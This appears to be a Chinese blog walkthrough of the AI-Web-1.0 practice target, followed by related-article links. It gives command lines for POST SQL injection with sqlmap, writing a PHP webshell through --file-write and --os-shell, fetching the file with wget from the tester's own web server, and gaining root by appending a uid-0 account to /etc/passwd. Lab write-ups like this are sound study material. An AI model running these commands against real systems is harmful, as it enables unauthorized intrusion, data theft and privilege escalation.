云尘靶场-AI-Web-1.0

最新推荐文章于 2024-05-20 22:14:20 发布
最新推荐文章于 2024-05-20 22:14:20 发布
阅读量136 收藏 1
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/134513550
版权

 还是先用fscan来扫c段

访问一下/robots.txt

访问一下看看 ,不能访问

删掉/upload

输个1 试试

 

1' 发现报错了

这里我们可以发现是post传参,那么sqlmap执行POST注入的方式

利用sqlmap进行POST注入_sqlmap post-CSDN博客

这里检查网络,看请求,可以看到传参

放到sqlmap

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid

说明存在sql注入

 >sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --dbs

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 --tables 

 sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 -T systemUser --dump --fresh-queries

这里没有flag,也不懂有什么用

访问另一个看看

 也是打不开,用dirsearch扫一下看看

 --os-shell

sqlmap --os-shell 原理详解_ZredamanJ的博客-CSDN博客

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --os-shell

 

--file-write

语法:

--file-write 木马文件 --file-dest 存放目录

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --file-write E:\123.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/123.php 

可以通过--os-shell 来检查一下是否上传成功

发现上传成功

那么我们可以通过蚁剑来连接了

 我以为这里就有flag了,但是并没有

python3 -m http.server 8888

打开终端我们可以发现我们的权限只是/www/data的权限

 

这里上传文件还看到别的方法,也来学习1下

wegt

本机开启web服务

python -m http.server 8888

因为我们的一句话木马在e盘下

所以我们在e盘下开启服务

open vpn里面有现在的ip

或者直接ipconfig

 

去kali的地址wget 123.php 

wget http://10.8.0.206:8888/123.php

 

成功了

提权

学习一下如何提权

回到蚁剑的终端

ls -l /etc/passwd

我们发现,当前用户对/etc/passwd有着读写权限r

通过 openssl passwd手动生成密码

openssl passwd 手动生成密码——passwd提权-CSDN博客

openssl passwd -1 -salt hack 123456

 root密码

root:x:0:0:root:/root:/bin/bash

x为密码 就是上面生成的

 

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

那我们通过echo写入

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

不能直接sudo hack 会报错

我们使用py命令

python -c 'import pty;pty.spawn("/bin/bash")'

 但是报错了说,没有成功

没事学到东西就可以了

木…
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2545
AI-WEB-1.0 多方法渗透
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2376
AI-WEB-1.0靶机的简单攻略
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 368
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
AI Web 1.0靶场记录
weixin_46411728的博客
02-11 275
AI Web 1.0靶场记录
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6104
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
netlimiter-4.0.41.0
01-03
netlimiter 4是最新版本的带宽分享和控制工具,可以有效地控制服务器或者个人计算机的带宽分配和控制,同时还可以有效地查看上行和下载带宽,让你对服务器的带宽有所了解。
虚幻4-4.15.1版本-创建物体及子弹发射
04-07
表示自己学习过程,遇到的问题及解决
AI-WEB-1.0
底层社会中的弱智
08-03 594
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
随便了解一下web1.0&web2.0&web3.0
ALEX_wxy的博客
02-11 1452
Web 1.0 It is the “readable” phrase of the World Wide Web with flat data. In Web 1.0, there is only limited interaction between sites and web users. Web 1.0 is simply an information portal where users...
VulnHub靶场AI Web 1.0
A_dmin的博客
05-20 564
VulnHub靶场AI Web 1.0 废话不多说,直接开始实验,都是老套路起步了 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 找到了靶机的IP地址,接下来进行端口扫描 nmap命令:nmap -p 1-65535 -sV 192.168.80.129 发现只开了一个80端口,我们进行访...
3张图让你秒懂Web3.0, 从1.0到3.0你不知道的互联网的演进史!
热门推荐
区块链大本营
03-24 1万+
来源 | Blockgeeks编译 | 贾瑞婷出品 | Blockchain_campWeb 3.0可以说是最近最火的词之一。简单说,Web 3.0意味着互联网发展史进入...
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1555
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1088
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
golang websocket 发送消息莫名其妙断开的问题记录
最新发布
qq_38189542的博客
05-20 36
公司需要做个B/S架构的前端展示项目,当前以为是小case,但是在实现后端功能的时候,还是被坑了。
综合性练习-验证码
cj13106811623的博客
05-15 814
生成验证码param(参数): 无Return: 图片的内容校验验证码用户输入的验证码5. 代码编写生成验证码://图型验证码写出,可以写出到文件,也可以写出到流try {//返回到浏览器修改前端代码相对应的接口验证成功。
springboot+vue2+elementui实现时间段查询
2301_76604664的博客
05-20 163
前端传来的时间数组,赋值给对应的属性;
vue3专栏项目 -- 五、权限管理(下)
m0_64931189的博客
05-15 813
我们这一系列做的就是,我们刚开始做了message组件,我们可以直接在某个组件中通过即可调用这个message组件,从而展示出这个提示信息框但是我们觉得它可以像以前用过的alert一样,直接通过一个函数调用就可以展示出这个组件,所以有了如下一步步改进:
vue3 el-date-picker设置禁用日期,只能选今天或者今天之后的日期
Dnn01的博客
05-14 283
vue3 el-date-picker设置禁用日期,只能选今天或者今天之后的日期
python EEL + vue3.js 简单示例
bigcarp的专栏
05-15 184
eel官方示例中暴露的js函数是全局函数,vue中的自定义函数作用域通常都是组件范围内。要让eel.js调用,需要将其升为全局可用。一般方法有 app.config.globalProperties 或 mixin等。
React: memo
卡卡西:一个擅长拷贝的前端程序员
05-14 522
React.memo 允许组件在 props 没有改变的情况下跳过重新渲染。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值